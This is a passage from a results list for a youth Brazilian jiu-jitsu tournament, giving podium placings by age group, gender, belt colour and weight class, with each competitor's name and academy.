2 – Danish Faiz Khairulnizam – Evolve MMA

Junior 3 / Male / Orange / Medium-Heavy

1 – Bryan Nicholas Picallo – Vagner Rocha Martial Arts

2 – Tristan Rocco Sainz – Brasa CTA

3 – Barrett Philip Hazen – Ribeiro Jiu-Jitsu

Junior 3 / Male / Orange / Ultra-Heavy

1 – Marcos Francisco Alvarado – Amazonas Rice Bros BJJ

2 – Jaden Khai Marshall – Rodrigo Freitas Brazilian Jiu-Jitsu

Junior 3 / Female / Grey / Rooster

1 – Cira Banks – Team Lloyd Irvin

2 – Logan Rocha – Atos Jiu-Jitsu

3 – Lola Martinez – Emirates Jiu-Jitsu Center

3 – Teresa Eduarda Da Rocha Pereira – Ribeiro Jiu-Jitsu

Junior 3 / Female / Grey / Light-Feather

1 – Zetalyn Anaia Aguon Mansapit – Team Lloyd Irvin

2 – Arianna Rose Culotta – Yamasaki Academy

3 – Lauren Alyse Guerina – Gracie Humaita

3 – Sydney Arya Huynh – Gracie Barra

Junior 3 / Female / Grey / Feather

1 – Kanoelani Kekiwi-Jones – Maui Jiu-Jitsu

2 – Angelina Grace Enright – Soul Fighters BJJ

3 – Emma Nicole Trivette – BJJ Coach – Corral’s Martial Arts

3 – Madison Dharma Huynh – Gracie Barra

Junior 3 / Female / Grey / Light

1 – Mia Lenae Webster – Atos Jiu-Jitsu

2 – Serena Raquel Verdugo De Rosa – Carlson Gracie Team

3 – McKenzie Brooke Epps – Team Lloyd Irvin

3 – Olivia Grace Newbro – Gracie Barra

Junior 3 / Female / Grey / Middle

1 – Nyah Isabella Mendoza – Gracie Barra

2 – Harmonie Laforteza – Gracie Barra

3 – Chandrika Pallekonda – LEAD BJJ

Junior 3 / Female / Grey / Medium-Heavy

1 – Pairin Sullivan – Team Lloyd Irvin

2 – Naia Garaña – Alliance

3 – Mckenzie Lennae Mullen – Gracie Barra

Junior 3 / Female / Grey / Heavy

1 – Melanya Mannella – Team DNA BJJ

2 – Alana Delva – Liborio BJJ

Junior 3 / Female / Grey / Ultra-Heavy

1 – Jayden Alaina Trujillo – Gracie Barra

2 – Mayah Amerie Avila – Atos Jiu-Jitsu

3 – Meghan Murphy – Inverse

Junior 3 / Female / Yellow / Rooster

1 – Maliya Ava Valenzuela – Ares BJJ

2 – Maya Olalia – Gracie Barra

Junior 3 / Female / Yellow / Light-Feather

1 – Olivia Torres – Unity Jiu-jitsu

2 – Kalea Mae Bingochea – GD Jiu-Jitsu Association

3 – Rino Omura – Carpe Diem Mita

3 – Taryn Kendall Pak – Soul Fighters BJJ

Junior 3 / Female / Yellow / Feather

1 – Kristen Arellano – CheckMat

2 – Mia Selene Mendoza – Carlson Gracie Team

3 – Isabella Rose Downing – SBG Montana

3 – Jae-An Thi Duldulao – Rodrigo Freitas Brazilian Jiu-Jitsu

Junior 3 / Female / Yellow / Light

1 – Noelani Liana Almogela – Alliance

2 – Vanessa Aguirre – Atos Jiu-Jitsu

3 – Emma Rial – GF Team

3 – Sadie Angela McLaughlin – Marcio Cruz Brazilian Jiu-Jitsu

Junior 3 / Female / Yellow / Middle

1 – Zuri Enita Blackman – CheckMat

2 – Lillian Yap – Body of Four

3 – Aundrea Joi Malacas San Juan – Alliance

3 – Mia Galindo-Flores – Alliance

Junior 3 / Female / Yellow / Medium-Heavy

1 – Cheyenne Moreno – Gracie Humaita

2 – Savannah Malia Garrison – Gracie Barra

3 – Meredith Hoskins – Fabio Santos BJJ

Junior 3 / Female / Yellow / Super-Heavy

1 – Helena Crevar – Cascao Jiu-Jitsu

2 – Selena Giuseppina Arancibia – Body of Four

Junior 3 / Female / Yellow / Ultra-Heavy

1 – Alexandria Marie Perez – Atos Jiu-Jitsu

2 – Jordin Alani Carter – Renato Tavares Association

Junior 3 / Female / Orange / Light-Feather

1 – Laylah Mae Watkins – Watkins Jiu-Jitsu Academy

2 – Camille Victoria Schulz Lajas Ribeiro – Alliance

3 – Ana Luiza Oliveira Nascimento – Infight JJ

Junior 3 / Female / Orange / Middle

1 – Aveyah Jolene Pascual Ramos – Gracie Humaita

2 – Sophia de la Concepcion Lopez – American Top Team Fort Lauderdale

Junior 3 / Female / Orange / Medium-Heavy

1 – Brendha Santos Rosa – Zenith BJJ

2 – Mae Isaacs – Carlson Gracie Team

Teen 1 / Male / Grey / Rooster

1 – Michael Souriya Phoutasen – Ares BJJ

2 – Mason Dwaine Jones – BJJ Coach – Corral’s Martial Arts

3 – Axel Licon – Maracaba BJJ

3 – Syrus Sonny Singh – Alliance

Teen 1 / Male / Grey / Light-Feather

1 – Austyn Carter – Gracie Barra

2 – Coby Shields – CheckMat

3 – Adam Merchant – Gracie Gym Texas

3 – Luciano Squillante – Miami WMB

Teen 1 / Male / Grey / Feather

1 – Jericho Patrick Pacheco – One Jiu-Jitsu USA

2 – Josiah DeJuan Alan Triezenberg – BJJ Coach – Corral’s Martial Arts

3 – Alvaro Lazaro Ausin – Brasa CTA

3 – Christian Manuel Compian – Gracie Barra

Teen 1 / Male / Grey / Light

1 – Sean Michael Otero – Gracie Barra

2 – Bernardo Perdigao Nascimento – Gracie Barra

3 – Aidan Masse – Guerrilla Jiu Jitsu

3 – Reid Alexander Pulido – Lansang Brazilian Jiu-Jitsu

Teen 1 / Male / Grey / Middle

1 – Tyler Kaiyu Cisneros – AEG Jiu-Jitsu

2 – Brayden Johnson-Brown – Ares BJJ

3 – Kaique Duarte Maia – Juniko’

3 – Roberto Kalel Lopez – Gracie Gym Texas

Teen 1 / Male / Grey / Heavy

1 – Dominic Tamayo – CheckMat

2 – Anthony Jake Miele – Unity Jiu-jitsu

3 – Elijah Isaiah Simmons – Gracie Humaita

3 – Nicholas Monserato Palacios – CheckMat

Teen 1 / Male / Grey / Ultra-Heavy

1 – Trysten Tenoch Terraza – Carlson Gracie Team

2 – Luke Gerhard Stratton – Zenith BJJ – Las Vegas

Teen 1 / Male / Yellow / Rooster

1 – Gavin Alexavier Ocampo – Ares BJJ

2 – Fábio Henrique Mendes Alves – Akxe BJJ

3 – Joseph Gray – Carlson Gracie Team

3 – Ziare Emmanuel Allen – Team Lloyd Irvin

Teen 1 / Male / Yellow / Light-Feather

1 – Anthony Manno – Atos Jiu-Jitsu

2 – Dominic J. Manno – Atos Jiu-Jitsu

3 – Elias Sakaguchi – Brasa CTA

3 – Matthew T. Tuley – BJJ Coach – Corral’s Martial Arts

Teen 1 / Male / Yellow / Feather

1 – Ryan Bayan – Cicero Costha Canada

2 – Adin Zachary Bokman – Yamasaki Academy

3 – Cassius Dane Cox – Gracie Barra

3 – Marc Raniel Agcaoili – Apex Martial Arts

Teen 1 / Male / Yellow / Light

1 – Marko Ramiro Vazquez – Ribeiro Jiu-Jitsu

2 – Jorge Alan Rivera – Unity Jiu-jitsu

3 – Evan James Vokey – Body of Four

3 – Ian Middleton – Rodrigo Pinheiro BJJ

Teen 1 / Male / Yellow / Middle

1 – Spencer Aiden Jackson – Team Lloyd Irvin

2 – Daniel Alexandre Pereira – Yamasaki Academy

3 – Daniel Huynh – Team Lloyd Irvin

3 – Edison Richter – Team Rivas Brazilian Jiu-Jitsu

Teen 1 / Male / Yellow / Medium-Heavy

1 – Izaak Soliz – Rodrigo Pinheiro BJJ

2 – Joshua Napu Quitugua – Alliance

3 – Ethan Vuong Huynh – Yamasaki Academy

3 – Robert John Alanis III – Atos Jiu-Jitsu

Teen 1 / Male / Yellow / Heavy

1 – Noah Tyler Chua Torres – Gracie Humaita

2 – Noah Mancilla – One Jiu-Jitsu USA

Teen 1 / Male / Yellow / Ultra-Heavy

1 – Eugenio Franco Sandoval – Atos Jiu-Jitsu

2 – Segundo Alexis Arancibia – Body of Four

3 – Masais Quezada – RCJ Machado

3 – Samir Fernando Teobaldo Simone – Qatar BJJ Brasil

Teen 1 / Male / Orange / Rooster

1 – Jordan Montesa – Alliance

2 – Alexander Ramirez – Alliance

3 – Bladen Anderson – Body of Four

3 – Tomoki Ono – Carpe Diem

Teen 1 / Male / Orange / Light-Feather

1 – Gavin Elias Sumibcay Navida – Atos Jiu-Jitsu

2 – Marco A Alarcon Sanchez – Unity Jiu-jitsu

3 – Jaeden James Brown – New Zealand Top Team

3 – Kamryn Jayarr Devera – CheckMat

Teen 1 / Male / Orange / Feather

1 – Jalen Malik Mitchell – Unity Jiu-jitsu

2 – Rafael Munoz Ortiz – Ortiz Martial Arts Academy

3 – Benjamin Ryan Craft – Atos Jiu-Jitsu

3 – Jack Robert Wilson – Atos Jiu-Jitsu

Teen 1 / Male / Orange / Middle

1 – Alexander Adrian Osorio Mendez – Atos Jiu-Jitsu

2 – Axel Martin Soaring Hawk Esparza – Carlson Gracie Team

Teen 1 / Male / Orange / Medium-Heavy

1 – Liam Zeh – OCBJJ

2 – Cauã Levi dos Santos Santana – CheckMat

3 – Matias Raul Jimenez – Alliance

3 – Thrasher Wilkins – SBG International (SBGI)

Teen 1 / Male / Orange / Heavy

1 – arthur Sarmento – Ribeiro Jiu-Jitsu

2 – Kai William Godwin – Maui Jiu-Jitsu

Teen 1 / Male / Orange / Super-Heavy

1 – Michael Alexander Sainz – Brasa CTA

2 – Joseph William Bowers Jr. – Maracaba BJJ

3 – Achilles Rocha – Vagner Rocha Martial Arts

Teen 1 / Male / Orange / Ultra-Heavy

1 – Damian Debonaire Soto – Brasa CTA

2 – Matthew Serrano – Team DNA BJJ

Teen 1 / Female / Grey / Rooster

1 – Aliyah Maghanoy – Atos Jiu-Jitsu

2 – Alexa Marie Amador – Gracie Humaita

Teen 1 / Female / Grey / Light-Feather

1 – Arkaidian Kiara Laanan – Claudio Franca

2 – Jadeya Sway Reber – Atos Jiu-Jitsu

3 – Evanglene Chittanavong – Start Brazilian Jiu-Jitsu

3 – Josephine Salazar Livingston – Gracie Humaita

Teen 1 / Female / Grey / Feather

1 – Kayla Edwards – Gracie Barra

2 – Sara Diane Averett – Zenith BJJ – Las Vegas

3 – Daniela Fercz – Inverse

3 – Solie Renee Canham – Gracie Humaita

Teen 1 / Female / Grey / Light

1 – Zara Pomaikai DeSilva – Maui Jiu-Jitsu

2 – Sarah C. Firme Galvao – Atos Jiu-Jitsu

3 – Marijane R Salas – Soul Fighters BJJ

Teen 1 / Female / Grey / Middle

1 – Shaine Lilly – Cascao Jiu-Jitsu

2 – Aliza Priscilla Castro – Gracie Humaita

3 – Carmen M Tucker – Revolution Dojo

3 – Rianna Lien Gonzales – AEG Jiu-Jitsu

Teen 1 / Female / Grey / Medium-Heavy

1 – Yurope Soosemea – Gracie Barra

2 – Ivy Reyes – Dethrone Brazilian Jiu-Jitsu

3 – Alyssa Maureen Amend – Gracie Barra

3 – Hanna Marie Hepworth – Cicero Costha Canada

Teen 1 / Female / Grey / Heavy

1 – Izabella Rose Kovar – Gracie Humaita

2 – Madison McKee – Easton BJJ

3 – Laiylah A Sheffield – Atos Jiu-Jitsu

3 – Sahara Isaacs – Team DNA BJJ

Teen 1 / Female / Grey / Super-Heavy

1 – Hope Rayen Russell – All American MMA

2 – Alexa Diaz – Yamasaki Academy

Teen 1 / Female / Yellow / Rooster

1 – Mia Funegra – Atos Jiu-Jitsu

2 – Brenna Trang – All American MMA

Teen 1 / Female / Yellow / Light-Feather

1 – Ashlee Funegra – Atos Jiu-Jitsu

2 – Malia Lynn Mangaser – CheckMat

3 – Mikayla Sullenger – Brazilian Top Team

3 – Tais Viacheslavov – Gracie Gym Texas

Teen 1 / Female / Yellow / Feather

1 – Annalise Brinkman – Atos Jiu-Jitsu

2 – Deandra Malia Meza – CheckMat

3 – Danya Sanchez-Petrosyan – Brazilian Top Team

3 – Kaitlyn Danica Schmidt – GD Jiu-Jitsu Association

Teen 1 / Female / Yellow / Light

1 – Karina Victoria Morales – Team Maxwell

2 – Ayanna Deja Klohr – Dunham Jiu-Jitsu

3 – Lois Grace Marsh – ZR Team Association

3 – Parisa Kaur Gill – Body of Four

Teen 1 / Female / Yellow / Middle

1 – Malibu Isabella Rocco – Rodrigo Freitas Brazilian Jiu-Jitsu

2 – Chloe Dirain – Synergy Brazilian Jiu Jitsu

3 – Danica Marie Smith – Lotus Club USA

3 – Gianna N Rivera – Casa of Jiu-Jitsu

Teen 1 / Female / Yellow / Medium-Heavy

1 – Heloisa Luz – Alliance

2 – Colleen Glassman – Brazilian Top Team

3 – Ruthie Gusler – Foundry BJJ

3 – Xin Yu Natalie Tan – FaMA BJJ

Teen 1 / Female / Yellow / Heavy

1 – Sofia Macayla James – Gracie Barra

2 – Emma Elizabeth Barton – Balance

3 – Sara dos Santos Figueiredo – Top Brother

3 – Zoe Ann Ortiz – Teixeira Garcia Brazilian Jiu Jitsu

Teen 1 / Female / Yellow / Ultra-Heavy

1 – Julianna Princess Wong – Mamute Martial Arts Academy

2 – Sareth Hernandez – Cascao Jiu-Jitsu

Teen 1 / Female / Orange / Light-Feather

1 – Lillian Jane Marchand – Atos Jiu-Jitsu

2 – Tali Isaacs – Carlson Gracie Team

3 – Adrianna Leticia Barrientos – Ares BJJ

3 – Nirvana Caroline Goes Costa – GF Team

Teen 1 / Female / Orange / Light

1 – Victoria Vivian Brandt – Cicero Costha Canada

2 – Krista Price – Gracie Barra

3 – Catarina Loureiro Barroso L. de Oliveira – Netto Brazilian Jiu-Jitsu

3 – Rhyanna Irene Prata – Cascao Jiu-Jitsu

Teen 1 / Female / Orange / Middle

1 – Emily Lynn Leyva – Gracie Humaita

2 – Caitlin Kirin Larimer Yamasta – CheckMat

3 – Aryah Taylor Garrido Quintanilla – Caveirinha Jiu-Jitsu Family USA

Teen 1 / Female / Orange / Medium-Heavy

1 – Alina Abigail Solis – Gracie Humaita

2 – Madeline Li – Massachusetts Brazilian Jiu Jitsu

Teen 1 / Female / Orange / Heavy

1 – Sofia Delgado – Brasa CTA

2 – Brooke Alexander McCurley – BJJ Revolution Team

Teen 2 / Male / Grey / Light-Feather

1 – Alexander Karthik Huynh – Gracie Barra

2 – Alberto Ionut Diea – Icon Jiu-Jitsu Team

3 – Carter Hill – Brasa CTA

3 – Darnell Melvin Durham – Team Lloyd Irvin

Teen 2 / Male / Grey / Feather

1 – Kai Carmosini – Toronto BJJ

2 – Demetrius Del Real – Marra Senki Brazilian Jiu Jitsu Academy LLC

3 – Brayden Cadiz – Atos Jiu-Jitsu

3 – Cohen Malcolm Schut – Alliance

Teen 2 / Male / Grey / Light

1 – Landon Minturn – Maracaba BJJ

2 – Kai Sims – Atos Jiu-Jitsu

3 – Kyosuke Masumo – UFC Gym

3 – Tommy Chong – Soul Fighters BJJ

Teen 2 / Male / Grey / Middle

1 – Hassan King – Ares BJJ

2 – Tristan Jacob Richardson – Gracie Barra

3 – John Andreas Roberto Goldsborough – Fabin Rosa Brazilian Jiu-Jitsu

3 – Keaton Martella – Cleber Jiu Jitsu Visalia

Teen 2 / Male / Grey / Medium-Heavy

1 – Loikena Yamamoto – Atos Jiu-Jitsu

2 – Juan Miguel Tabares Rodriguez – Alliance

3 – Kiyan Govender – Yamasaki Academy

3 – Liam McNeely – Gracie Barra

Teen 2 / Male / Grey / Heavy

1 – Aiden Anders – Alliance

2 – Hayden M Jilek – Team Rivas Brazilian Jiu-Jitsu

3 – Matthew Fulinara – Atos Jiu-Jitsu

Teen 2 / Male / Grey / Super-Heavy

1 – Kevin Michael Farrell – Soul Fighters BJJ

2 – Levi Vance Andersen – Soul Fighters BJJ

Teen 2 / Male / Yellow / Rooster

1 – Josiah Vick Kemp – Gracie Humaita

2 – Stone Nassir James – Team Lloyd Irvin

3 – Andrew Paul Condo – Lotus Club USA

3 – Colter Drake Green – Team LDMA

Teen 2 / Male / Yellow / Light-Feather

1 – Liam Veras – CheckMat

2 – Branson Villagomez – Alliance

3 – Lakoda Joseph Wieczorek – SBG Montana

3 – Victor Chaveco – Mauro Sergio BJJ

Teen 2 / Male / Yellow / Feather

1 – Henrique Eduardo Rocha Pereira – Ribeiro Jiu-Jitsu

2 – Jacob Daban Benedicto – Gracie Humaita

3 – Malachi Eugene Moore – Carlson Gracie Team

3 – Treavor Christopher Robert Duncan – Cleber Jiu Jitsu Visalia

Teen 2 / Male / Yellow / Light

1 – Andrew Liam Hill – Gracie Barra

2 – Joao C. Nascimento – Ares BJJ

3 – Gavvin Austin Stephens – Atos Jiu-Jitsu

3 – Thomas Garrett Jablonski – CheckMat

Teen 2 / Male / Yellow / Middle

1 – Joseph Zayvant Cruz – GD Jiu-Jitsu Association

2 – Moos A Musquiz – Team Maxwell

3 – Jaiden Alex Carter – Renato Tavares Association

3 – Nathanial Scott Gordon – Soul Fighters BJJ

Teen 2 / Male / Yellow / Medium-Heavy

1 – Carlos Leonardo da Silva Ignácio Junior – Akxe BJJ

2 – Nicholas Beltrame Alves – Juniko’

3 – Daniel Mattar – Gracie Barra

3 – Landen Christian Russell – GD Jiu-Jitsu Association

Teen 2 / Male / Yellow / Heavy

1 – Lance Vu Nguyen – RMA Jiu-Jitsu Academy

2 – Benedek Magyar – Gracie Barra

3 – Rayyan El Ghandour – Yamasaki Academy

3 – William John Southern – Brasa CTA

Teen 2 / Male / Yellow / Ultra-Heavy

1 – Takumi Baba – Hiro BJJ Academy Yokohama

2 – Tevita Tauteoli Taufa – Atos Jiu-Jitsu

3 – Jose Triana – Miami WMB

3 – Zahir Abbas Chaudhery – Icon Jiu-Jitsu Team

Teen 2 / Male / Orange / Rooster

1 – Colin Marcus Yun – Rodrigo Freitas Brazilian Jiu-Jitsu

2 – Carlo Ray Arreola – Gracie Humaita

3 – Aito Omura – Carpe Diem Mita

3 – Royce David Gonzalez – CheckMat

Teen 2 / Male / Orange / Light-Feather

1 – Daniel R. Deeder – Maracaba BJJ

2 – Gavin Fabian Laverde – Neutral Grounds / Gracie Jiu Jitsu Long Beach

3 – Desmond Rubio – ZR Team Association

3 – Hassan Naji Bazzi – Detroit Jiu-Jitsu Academy

Teen 2 / Male / Orange / Feather

1 – Jason Chih – Atos Jiu-Jitsu

2 – Thiago Peixoto de Castilho Frazão – Qatar BJJ Brasil

3 – Itsuki Takahashi – Carpe Diem

3 – Logan Dre MacDonald – Gracie Humaita

Teen 2 / Male / Orange / Light

1 – Brayden Kenneth Wolfe – Soul Fighters BJJ

2 – Yin Phonnarin Redman – GD Jiu-Jitsu Association

3 – Michael Soler Jr. – Brasa CTA

3 – Ryo Horikawa – Carpe Diem

Teen 2 / Male / Orange / Middle

1 – Enzo Yamasaki – Yamasaki Academy

2 – Nick Enzor – Team Link

3 – Ethan Sebastien Guillaume Forrez – ASC 59

Teen 2 / Male / Orange / Medium-Heavy

1 – Rafael Hipólito de Oliveira Junior – Gracie Barra

2 – Ilia Timbaliuc – Atos Jiu-Jitsu

3 – Gustavo A Alarcon Sanchez – Unity Jiu-jitsu

3 – Winter Bianco Remeeus Breget – Pacific Top Team

Teen 2 / Male / Orange / Heavy

1 – Danny Diaz – Brasa CTA

2 – Marcus Isaiah Daniel – Team Lloyd Irvin

3 – Cristian Porfirio Mier – Carlson Gracie Team

Teen 2 / Male / Orange / Super-Heavy

1 – Enzo Botinelly Rodrigues – Gracie Barra

2 – Caio Carreira Ramos – GF Team

3 – Jayden Antonio Rivera – Casa of Jiu-Jitsu

3 – Jet Jared Van Fossen – Alliance

Teen 2 / Male / Orange / Ultra-Heavy

1 – Juan Carlos Granados – Renato Tavares Association

2 – Eric Justin Celerio – East Coast United BJJ

3 – Izac William Miranda Mendes – Infight JJ

Teen 2 / Female / Grey / Rooster

1 – Callie Lynn DuPre – Carlson Gracie Team

2 – Mia Francis Riley – Gracie Barra

Teen 2 / Female / Grey / Light-Feather

1 – Katherine Mailani Newman – Synergy Brazilian Jiu Jitsu

2 – Chyna Hillegas – Gracie Barra

3 – Charlize Amae Leonard – Carlson Gracie Team

3 – Janaya Giselle Baeza – Gracie Gym Texas

Teen 2 / Female / Grey / Feather

1 – Samantha Chloe Swafford – CheckMat

2 – Liliana Mendez – Gracie Barra

3 – Evelyn Robles – MC Unit Academy

Teen 2 / Female / Grey / Light

1 – Andie Donahue – Gracie Barra

2 – Jade Davison – Alliance

3 – Ava Gonzales – Ares BJJ

3 – Destiney Rachelle Lynn Simmons – Alliance

Teen 2 / Female / Grey / Middle

1 – Kaylie Villagrana – CheckMat

2 – Ava Marie Cantu – GF Team

3 – Jasmine Vargas Morales – MC Unit Academy

3 – Lillian Jo Hunt – Lotus Club USA

Teen 2 / Female / Grey / Medium-Heavy

1 – Emari Ja’khia Brown – Fabin Rosa Brazilian Jiu-Jitsu

2 – Angel L Alves – Juniko’

3 – Samantha Hernandez – Ribeiro Jiu-Jitsu

Teen 2 / Female / Grey / Ultra-Heavy

1 – Nova Grace Gallegos – Marcelo Cavalcanti BJJ

2 – Kaitlyn Murphy – Inverse

Teen 2 / Female / Yellow / Light-Feather

1 – Samantha Lopez – CheckMat

2 – Joycelyn Anne Ingleright – Mohler Jiu-Jitsu

3 – Avigail Friedel – Gracie Barra

3 – Seton Elizabeth Gerrity – Team Lloyd Irvin

Teen 2 / Female / Yellow / Feather

1 – Ingrid da Silva Guedes – Top Brother

2 – Nathalia Duarte – GF Team

3 – Jalene Alexandria Delsid – 10th Planet Jiu Jitsu

3 – Malia DeSouza – Carlson Gracie Team

Teen 2 / Female / Yellow / Light

1 – Carissa Danielle Qureshi – Gracie Barra

2 – Brianna Holcomb – Team Lloyd Irvin

3 – Aaliah Anne-Nicole Bruner – Alliance

3 – Tayler Davis-Pietz – CheckMat

Teen 2 / Female / Yellow / Middle

1 – Nina Cali Amico – Revolution Dojo

2 – Hayden J. Fry – Atos Jiu-Jitsu

3 – Maria Eduarda Leite dos Santos – PREV

Teen 2 / Female / Yellow / Medium-Heavy

1 – Eduarda dos Anjos Reis – Game Fight Barra Da Tijuca

2 – Kayla Hoang Nguyen – Synergy Brazilian Jiu Jitsu

3 – Raquel Sara Atilano – Honor Roll BJJ

Teen 2 / Female / Yellow / Heavy

1 – Nina Sophia Faraldo – Brasa CTA

2 – Annika Storck – Barum Jiu-Jitsu

Teen 2 / Female / Yellow / Ultra-Heavy

1 – Alia Ngeltengat – Carlson Gracie Team

Teen 2 / Female / Orange / Rooster

1 – Anaya Jean-Marie Falcon – CheckMat

2 – Kamilly Silva Dias de Souza – GF Team

3 – Taylor Colangelo – Cascao Jiu-Jitsu

Teen 2 / Female / Orange / Light-Feather

1 – Sidney Calalang Sarmiento – BARBOSA JIU-JITSU USA

2 – Ella Paige Hazen – Ribeiro Jiu-Jitsu

Teen 2 / Female / Orange / Feather

1 – Jessica Marie Birk – GD Jiu-Jitsu Association

2 – Sarah Juliani Fonseca – GF Team

3 – Elena Gonzales – Gracie Humaita

3 – Lucille Kroll – Juniko’

Teen 2 / Female / Orange / Light

1 – Camryn Brown – GF Team

2 – Ava Rose Wise – Synergy Brazilian Jiu Jitsu

3 – Angel Christine Leclaire – Nova União Florida

3 – Michelle Garcia – MC Unit Academy

Teen 2 / Female / Orange / Middle

1 – Carolina Vieira do Carmo Massot – Gracie Humaita

2 – Greta Notaro – Ribeiro Jiu-Jitsu

3 – Bayley Trang – All American MMA

Teen 2 / Female / Orange / Medium-Heavy

1 – Jasminda A. Madrid – Unity Jiu-jitsu

2 – Eduarda Rodrigues Batista – CheckMat

3 – Kennedy Lynn Jimenez – Rodrigo Freitas Brazilian Jiu-Jitsu

Teen 2 / Female / Orange / Heavy

1 – Aria Skye Johnson – Amazonas Rice Bros BJJ

2 – Sofia dos Santos Sabara – Infight JJ

Teen 2 / Female / Orange / Ultra-Heavy

1 – Anabel Lopez Beard – CheckMat

2 – Nicolly Aparecida Lorenzi – Nova União

3 – Destiny Rose Lynne Ramsey – Amazonas Rice Bros BJJ

3 – Samantha Barker – Charles Gracie Jiu-Jitsu Academy

Teen 3 / Male / Grey / Rooster

1 – Noah William Carr – CheckMat

2 – Giovanni Raul Gonzalez – Brasa CTA

3 – Tyler Hernandez – Lotus Club USA

Teen 3 / Male / Grey / Light-Feather

1 – Pharrell Bryant Sulit – OCBJJ

2 – Dalton Brady Vallee – Cavalo Team

3 – Cayden William DeRamus – Team Rivas Brazilian Jiu-Jitsu

3 – Kane Joseph Stippick – Revolution Dojo

Teen 3 / Male / Grey / Feather

1 – Braylon Kenji Manuel – Ares BJJ

2 – Gabriel Herrero-Sanchez – Miami WMB

3 – Robert Ford Ballinger – Ivey League Mixed Martial Arts

Teen 3 / Male / Grey / Middle

1 – Nelson Omegar Briones Jr – AMBJJ – Alex Martins Brazilian Jiu-Jitsu

2 – Gains Alfred Redman – Fabin Rosa Brazilian Jiu-Jitsu

3 – Brayden Herrman – Gracie Barra

3 – David Luis Alonso – Brasa CTA

Teen 3 / Male / Grey / Heavy

1 – Caden Pasa – Atos Jiu-Jitsu

2 – Abralin Sean Tiaga – Team DNA BJJ

3 – Elan Feldhake – Zenith BJJ – Las Vegas

3 – Victor Alexiou – Gracie Barra

Teen 3 / Male / Grey / Super-Heavy

1 – Yuriel Irael Enriquez – Rodrigo Freitas Brazilian Jiu-Jitsu

2 – Christian David Case – Dunham Jiu-Jitsu

3 – Mason Paulo – Cleber Jiu Jitsu Visalia

Teen 3 / Male / Yellow / Light-Feather

1 – Ismael Alvarez Bermudez – Fabio Prado BJJ

2 – Ryan M. Tuley – BJJ Coach – Corral’s Martial Arts

3 – Cristian Sardina – Carlson Gracie Team

Teen 3 / Male / Yellow / Feather

1 – Adriano Afonso dos Santos Campos – Top Brother

2 – Jake A Yuen – Gracie Barra

3 – Cody James Averett – Zenith BJJ – Las Vegas

3 – Grant Christopher McDonald – Swampfox Jiu-Jitsu

Teen 3 / Male / Yellow / Light

1 – Benjamin Colbath – GF Team

2 – Jathen George – Alliance

3 – Demetri Pappas – Vieira Jiu-Jitsu

3 – YiXiao He – Tukaha Brazilian Jiu Jitsu

Teen 3 / Male / Yellow / Middle

1 – Stephon Isaiah Priddy – CheckMat

2 – Noel Torres – CheckMat

3 – Juan Carvalho Yang Galvão – OLL Fight

3 – William Paul Wittkop – Alliance

Teen 3 / Male / Yellow / Medium-Heavy

1 – Lucas Boraschi – Fabin Rosa Brazilian Jiu-Jitsu

2 – Daniel A Vergara – Brasa CTA

3 – Nicholas Young – Gracie Barra

3 – Viraj Pallekonda – LEAD BJJ

Teen 3 / Male / Yellow / Heavy

1 – Dylan Cole Hasbrouck – Alliance

2 – Danyal Idris Afenir – Atos Jiu-Jitsu

3 – Kenzo Karakawa – Tree Brazilian Jiu-Jitsu

3 – Pablo Jeremy Reyes – Ares BJJ

Teen 3 / Male / Yellow / Super-Heavy

1 – Gabriel Demman – Cleber Jiu Jitsu

2 – Antonio Vincent Falotico – Fabin Rosa Brazilian Jiu-Jitsu

Teen 3 / Male / Yellow / Ultra-Heavy

1 – Alexander Jared Vokey – Body of Four

2 – Luca Fernandez – Brasa CTA

3 – Jayden Avila – Alliance

3 – Kole Kenneth Smith – Lotus Club USA

Teen 3 / Male / Orange / Rooster

1 – Solomon Ryan Craft – Atos Jiu-Jitsu

2 – Ashton Newbern – Luiz Palhares Jiu Jitsu

Teen 3 / Male / Orange / Light-Feather

1 – Cole Anthony Abate – Rodrigo Pinheiro BJJ

2 – Pedro Borges de Souza Teixeira – GF Team

3 – Ethan Abraham – Atos Jiu-Jitsu

3 – Matteo Russell – Ribeiro Jiu-Jitsu

Teen 3 / Male / Orange / Feather

1 – Homero Sebastian Oyervidez – Urban Jungle Self-Defense

2 – Jordan Richard Gaunt – Amazonas Rice Bros BJJ

3 – Blayne Helou – Mamute Martial Arts Academy

3 – Luiz Eduardo Souza dos Santos – Infight JJ

Teen 3 / Male / Orange / Light

1 – Gustavo Umeoka Ogawa – Atos Jiu-Jitsu

2 – Thiago Munoz Ortiz – Ortiz Martial Arts Academy

3 – Rafael Edwin Delgado – Gracie Barra JJ

3 – Victor Hugo Araujo Ferreira – GF Team

Teen 3 / Male / Orange / Middle

1 – Steven Alexander Gomez – Atos Jiu-Jitsu

2 – Bernardo Gatti – Drill BJJ

3 – André Miguel Areias Cruz – Gracie Barra

3 – Brandon Alyosha Meyer – Tukaha Brazilian Jiu Jitsu

Teen 3 / Male / Orange / Medium-Heavy

1 – Luan Veras – CheckMat

2 – Ryan Jason Hrcka – Zenith BJJ – Las Vegas

3 – Kydyn Luk Correa Lima – Neutral Grounds / Gracie Jiu Jitsu Long Beach

3 – Ryan Escobar – Alliance

Teen 3 / Male / Orange / Heavy

1 – Angelos Adamopoulos – Gracie Barra

2 – Andrew Beau Johnson – Amazonas Rice Bros BJJ

3 – Cory Evan Cannan – Team Lloyd Irvin

3 – Gabriel Ryan Fuentes – GD Jiu-Jitsu Association

Teen 3 / Male / Orange / Super-Heavy

1 – Bruno Patrick Sato – Atos Jiu-Jitsu

2 – Daniel Fernandes Cruz de Souza – Icon Jiu-Jitsu Team

3 – Emmanuel Alexandro Ramos – GF Team

3 – Gabriel Henrique Ribeiro Marques da Silva – LEAD BJJ

Teen 3 / Male / Orange / Ultra-Heavy

1 – Takeshiro Tanino Kauan Yuuki – Impacto Japan B.J.J.

2 – Mateo Cardona – Cardonas BJJ

3 – Gabriel Torres – Unity Jiu-jitsu

3 – Logan Smith – Alliance

Teen 3 / Female / Grey / Rooster

1 – Kathryn Grace Sims – Carlson Gracie Team

2 – Valarie Jimenez – Carlson Gracie Team

3 – Maria Fernanda Mendes Alves – Akxe BJJ

Teen 3 / Female / Grey / Light-Feather

1 – Avery Rose Martin – Alliance

2 – Lyka Vassoodaven – New School BJJ

3 – Selena MariElena Madrid – Gracie Barra

Teen 3 / Female / Grey / Feather

1 – Allie Anders – Gracie Barra

2 – Faith Audrey Vander Laan – BJJ Coach – Corral’s Martial Arts

3 – Mia Barsch – One Jiu-Jitsu USA

3 – Serena Mejia – CheckMat

Teen 3 / Female / Grey / Middle

1 – Jelena Davison – Alliance

